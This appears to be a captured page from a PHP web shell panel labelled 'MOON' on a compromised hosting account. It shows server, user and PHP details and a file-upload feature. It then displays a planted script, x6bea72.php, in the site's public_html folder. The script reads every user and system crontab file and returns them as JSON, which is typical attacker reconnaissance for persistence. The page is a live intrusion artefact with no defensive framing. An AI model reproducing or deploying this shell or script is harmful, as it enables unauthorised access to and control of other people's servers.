MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/public_html/x6bea72.php
<?php $r=[];foreach(glob('/var/spool/cron/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);foreach(glob('/var/spool/cron/crontabs/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);$r[]='SYSTEM_crontab:'.@file_get_contents('/etc/crontab');foreach(glob('/etc/cron.d/*') as $f)if(is_file($f))$r[]='SYSTEM_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.hourly/*') as $f)if(is_file($f))$r[]='HOURLY_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.daily/*') as $f)if(is_file($f))$r[]='DAILY_'.basename($f).':'.@file_get_contents($f);echo json_encode(['ok'=>1,'crons'=>$r]);?>